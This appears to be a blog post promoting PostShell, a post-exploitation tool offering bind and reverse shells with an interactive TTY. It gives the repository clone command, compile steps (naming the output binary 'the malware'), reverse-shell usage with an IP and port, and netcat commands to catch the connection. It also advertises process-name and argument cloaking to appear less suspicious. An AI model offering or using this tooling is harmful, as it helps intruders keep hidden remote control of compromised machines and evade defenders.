PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.
ScreenShots
Banner and interaction with shell after a connection is started.
Also Read – Metame : Metamorphic Code Engine For Arbitrary Executables
Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.
It also incorporates both a back connect and bind shell, meaning that if a target doesn’t allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.
PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.
Features
Getting Started
Downloading: git clone https://github.com/rek7/postshell
Compiling: cd postshell && sh compile.sh This should create a binary called “stub” this is the malware.
Commands
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Example Usage
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Recieving a Connection with Netcat
Recieving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port
General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…
If you are a Linux user, you have probably seen commands like chmod 777 while…
Vim and Vi are among the most powerful text editors in the Linux world. They…
Working with compressed files is a common task for any Linux user. Whether you are…
In the digital era, an email address can reveal much more than just a contact…